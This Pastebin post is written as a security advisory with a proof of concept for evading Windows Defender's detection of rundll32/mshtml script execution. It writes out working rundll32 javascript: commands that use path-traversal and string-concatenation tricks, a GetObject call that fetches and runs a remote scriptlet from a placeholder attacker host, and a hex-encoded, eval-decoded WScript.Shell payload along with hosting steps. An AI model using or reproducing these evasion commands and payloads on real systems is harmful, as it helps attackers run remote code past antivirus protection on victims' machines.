API tools faq
paste
Advertisement
G0dR4p3

0x01_WinDefender

G0dR4p3
Jan 11th, 2022
77
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.86 KB | None | 0 0
raw download clone embed print report
  1. Windows Defender Detection Bypass
  2. TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A
  3.  
  4.  
  5. [CVE Reference]
  6. N/A
  7.  
  8.  
  9. [Security Issue]
  10. Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
  11. and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra path traversal when referencing mshtml.
  12.  
  13. C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
  14. Access is denied.
  15.  
  16. Pass an extra "..\" to the path.
  17. C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)
  18.  
  19. Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp").
  20. However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the payload.
  21.  
  22. C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
  23. Access is denied.
  24.  
  25. Full bypass E.g.
  26.  
  27. C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
  28.  
  29. Enter, Backdoor:JS/Relvelshe.A detection.
  30.  
  31. Windows Defender also prevents downloaded code execution, detected as "Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it hits InetCache.
  32. "C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"
  33.  
  34. However, this is easily bypassed by Hex encoding our payload code new ActiveXObject("WScript.Shell").Run("calc.exe").
  35. Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function.
  36.  
  37.  
  38. [References]
  39. Trojan:Win32/Powessere.G
  40. https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427
  41.  
  42. Backdoor:JS/Relvelshe.A
  43. https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426
  44.  
  45. Advisory:
  46. https://twitter.com/hyp3rlinx/status/1480651583172091904
  47.  
  48.  
  49. [Exploit/PoC]
  50. 1) Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection.
  51.  
  52. python -m http.server 80
  53.  
  54. "hi.tmp"
  55.  
  56. <?xml version="1.0"?>
  57. <component>
  58. <script>
  59. <![CDATA[
  60. var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
  61. var str = '';
  62. for (var n = 0; n < hex.length; n += 2) {
  63. str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
  64. }
  65. eval(str)
  66. ]]>
  67. </script>
  68. </component>
  69.  
  70.  
  71. 2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
  72.  
  73.  
  74. BOOM!
  75.  
  76.  
  77. [Network Access]
  78. Local
  79.  
  80.  
  81. [Severity]
  82. High
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!